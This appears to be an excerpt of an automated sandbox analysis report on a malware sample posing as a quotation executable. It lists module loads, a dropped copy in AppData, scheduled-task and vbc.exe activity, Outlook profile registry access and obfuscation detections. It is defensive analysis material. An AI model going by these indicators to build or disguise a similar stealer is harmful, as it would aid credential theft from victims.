                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mscoree.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: version.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: uxtheme.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: windows.storage.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: wldp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: profapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptsp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rsaenh.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: cryptbase.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasapi32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasman.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rtutils.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mswsock.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winhttp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dnsapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: winnsi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: secur32.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: sspicli.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: schannel.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ntasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncrypt.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: msasn1.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: gpapi.dll
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: QUOTATION 03664710859027.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: QUOTATION 03664710859027.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: QUOTATION 03664710859027.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: woeJ.pdbSHA256 source: QUOTATION 03664710859027.exe, IEGkgGtnYpDN.exe.0.dr
                Source: Binary string: woeJ.pdb source: QUOTATION 03664710859027.exe, IEGkgGtnYpDN.exe.0.dr

                Data Obfuscation

                barindex
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HywVl7aGgs78jMHBmX.cs.Net Code: SBT1YTXQjUMFnOKI3Fk System.Reflection.Assembly.Load(byte[])
                Source: QUOTATION 03664710859027.exeStatic PE information: 0xD5333D7C [Fri May 7 08:44:44 2083 UTC]
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014DE610 push eax; retf 0_2_014DE631
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014DEE80 pushfd ; iretd 0_2_014DEE81
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014D5DFF pushfd ; iretd 0_2_014D5E29
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07608D20 push 08418B05h; ret 0_2_07608D33
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07736C69 push eax; iretd 0_2_07736C6A
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD8710 push 18418B05h; ret 0_2_07FD8723
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD75B0 push 10418B05h; ret 0_2_07FD75C3
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD7180 push 0C418B05h; ret 0_2_07FD7193
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FDE064 push 0C418B05h; ret 0_2_07FDE713
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0147E610 push eax; retf 9_2_0147E631
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0147EE80 pushfd ; iretd 9_2_0147EE81
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_01475DFF pushfd ; iretd 9_2_01475E29
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076BC38F push 076BC3DAh; ret 9_2_076BC3CE
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B2EBE push esp; iretd 9_2_076B2EC5
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B6C69 push eax; iretd 9_2_076B6C6A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09472840 push esp; retf 13_2_09472AC9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09472E78 push esp; iretd 13_2_09472E79
                Source: QUOTATION 03664710859027.exeStatic PE information: section name: .text entropy: 7.676097604846761
                Source: IEGkgGtnYpDN.exe.0.drStatic PE information: section name: .text entropy: 7.676097604846761
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, N1vprvInGfk6IoGVVa.csHigh entropy of concatenated method names: 'mZWVfeefs8', 'VXJValbucU', 'NiyVj4hQqW', 'z9bV8NERj3', 'URXV1tDFQF', 'A1oV79SkL0', 'NUQEReOxOnIK6mF443', 'CtVb6A5bbh9g2x7ilQ', 'YjEVV4nX1F', 'y9DV9VHFcS'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HywVl7aGgs78jMHBmX.csHigh entropy of concatenated method names: 'yqO9vBPS3Z', 'Dtt9gHIg5c', 'T159TL3vM8', 'KRl9x3g5ip', 'jas92PQ5O8', 'xHN9iGLsbP', 'kvD9fka6Rx', 'Ku99aDwkQL', 'cAm9ly1jQN', 'r5H9jAoF1U'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, WQrVcqBNWMc5Uc0mxP.csHigh entropy of concatenated method names: 'k4FQ6IRh5', 'i9eqALYLs', 'QAxMKCF5D', 'UqvC9w6PX', 'cEvnU3c3q', 'V3SWke338', 'nA23iu0prCYRKYTFky', 'WCNr0f8tGEJXSvLIX4', 'oORSepijQ', 'HDKtx9aUW'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, O8XAE6VVnliJ0oGriAZ.csHigh entropy of concatenated method names: 'MtZtPnWpWD', 'TG0tz7MIRv', 'Hsw6RtonKf', 'Otd6VVhWQG', 'BHq6BBkZtv', 'cQB69I1eYA', 'XZO6ICPGA5', 'GJu6vQvNut', 'mVK6gtZTdk', 'Nru6TQdcKc'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HsGE6mztb4idLHOYoP.csHigh entropy of concatenated method names: 'BHMtMEBy86', 'KfMtJA2h7m', 'aUItnjaK3Y', 'YFytdDo3rA', 'yPItEP3QpH', 'txxtyiawBy', 'LmltArxxtg', 'o1HtO9o1uZ', 'nxjtYUNY5b', 'srTtXEmoUU'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, Feefs8JDXJlbucURht.csHigh entropy of concatenated method names: 'XkQTcipI93', 'YPOTkpoQPT', 'wC4TU20Hha', 'kliT0KNZvD', 'uCuTmgvYFO', 'ejyT5J5HEM', 'CYVTD93SW1', 'bJgTrDBpZL', 'XGeTpZGsWP', 'cRxTP3rIPC'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, t3PY84niy4hQqWQ9bN.csHigh entropy of concatenated method names: 'M4Vxqu9cad', 'Px3xM7wwIf', 'oCTxJCc1wU', 'ko1xnABKo0', 'F3cx1brkEY', 'kagx7mAX5C', 'Mq6xNjXcK4', 'Gr9xS4rV30', 'kWexwc85pZ', 'AI8xttBdoV'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, byhlD55gJklQ6LrPA2.csHigh entropy of concatenated method names: 'JWNNrh06MB', 'fmCNPrN3IG', 'LNBSRoytnZ', 'oDmSVxgUin', 'aiKNZ8whI1', 'CMtNH3Xyjr', 'iLaNGDWWL7', 'TDUNcS8Yph', 'mRhNk50CNK', 'RegNU03hMc'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, yeJKe1VIgIZ79Noc1nh.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'IgHowvq976', 'YR1otVrT4D', 'KxUo6gEiR7', 'CwbooUIwLp', 'udNoeSF4Dt', 'sutobPKHYu', 'yDsoOojEjF'
                Source: 0.2.QUOTATION 03664710859027.exe.7a20000.3.raw.unpack, HRj3dcWSvkEh3mRXtD.csHigh entropy of concatenated method names: 'YZH2KrNt9A', 'lef2CMLKFD', 'pEbxhdT62n', 'hjBxyaQoj7', 'jdGxARdF1d', 'Oy6xsh83mE', 'GE0xL14OnW', 'jQ4x3Weob5', 'ulnxF2CoNi', 'XTfx48B9hQ'
